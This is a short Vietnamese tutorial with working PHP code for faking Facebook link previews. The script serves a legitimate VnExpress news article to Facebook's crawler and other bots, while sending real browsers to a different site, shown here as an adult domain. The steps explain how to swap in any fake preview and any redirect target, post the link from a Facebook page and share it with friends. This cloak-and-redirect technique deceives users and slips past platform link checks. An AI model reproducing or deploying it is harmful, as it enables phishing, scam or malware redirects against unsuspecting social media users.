Share Code Fake Link Facebook


Tạo file PHP với nội dung như sau:

<?php
if (preg_match('/firefox|chrome|iphone|android|safari/i', $_SERVER['HTTP_USER_AGENT']) && !preg_match('/facebook|skype|preview|bot|crawl|slurp|spider|google/i', $_SERVER['HTTP_USER_AGENT'])) {
} else {
    header('HTTP/1.1 206 Partial Content');
    header('Accept-Ranges: bytes');
    header('Location: http://vnexpress.net/photo/thoi-su/cong-ty-may-o-can-tho-tan-hoang-sau-chay-thiet-hai-6-trieu-usd-3560293.html');
    exit;
} ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>Load...</title>
</head>
<body>
<script type="text/javascript">window.location.href = decodeURIComponent("https://fuckbook.com");</script>
</body>
</html>

Thay thế chỗ link vnexpress bằng link mà bạn muốn fake
Chỗ window.location.href bằng link bạn muốn redirect khi có người click vào.
Upload nội dung file php lên hosting của bạn.
Dùng page facebook do bạn làm admin, dùng link của file trên post bài, ở đây bạn sẽ chỉnh được ảnh và tiêu đề bài viết tùy ý
Share bài viết của post lên page vào wall của bạn hoặc gửi chọc bạn bè. Enjoy ^^!